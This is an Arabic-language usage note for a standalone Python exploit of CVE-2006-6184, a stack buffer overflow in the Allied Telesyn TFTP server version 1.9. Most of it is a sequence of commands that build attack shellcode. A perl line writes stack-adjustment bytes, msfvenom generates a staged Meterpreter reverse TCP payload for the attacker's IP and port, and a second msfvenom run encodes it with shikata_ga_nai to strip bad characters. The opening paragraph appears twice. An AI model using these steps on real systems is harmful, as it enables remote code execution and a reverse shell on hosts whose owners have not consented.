
هذا استغلال مستقل مبني على Python لـ CVE-2006-6184. يقوم هذا الاستغلال بتشغيل تجاوز سعة المخزن المؤقت القائم على المكدس في خادم Allied Telesyn TFTP (AT-TFTP) الإصدار 1.9، وربما الإصدارات السابقة، مما يسمح للمهاجمين عن بُعد بالتسبب في رفض الخدمة أو تنفيذ تعليمات برمجية عشوائية.
هذا استغلال مستقل مبني على بايثون لـ CVE-2006-6184. يقوم هذا الاستغلال بتفعيل تجاوز سعة المخزن المؤقت القائم على المكدس في خادم Allied Telesyn TFTP (AT-TFTP) الإصدار 1.9، وربما الإصدارات السابقة، مما يسمح للمهاجمين عن بُعد بالتسبب في رفض الخدمة أو تنفيذ كود عشوائي.
يجب تخصيص الحمولة (payload) لتتضمن عنوان IP الخاص بك ومنفذ الاستماع، لذا ستحتاج إلى توليدها يدويًا. للقيام بذلك، اتبع الخطوات التالية:
1.) أدخل الأمر التالي لإنشاء ملف سداسي عشري للمقدار الذي يجب طرحه من مؤشر المكدس (3500):
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) بعد ذلك، استخدم الأمر التالي لإنشاء حمولة متروبريتر (meterpreter) المرحلية:
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) ثم، ادمج الملفين اللذين أنشأتهما للتو.
cat stackadj payload > shellcode
4.) أخيرًا، لنقم بإزالة الأحرف السيئة.
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python
أدخل المخرجات كقيمة للمتغير "payload". قد تحتاج إلى تشغيل هذا الاستغلال عدة مرات حتى يعمل.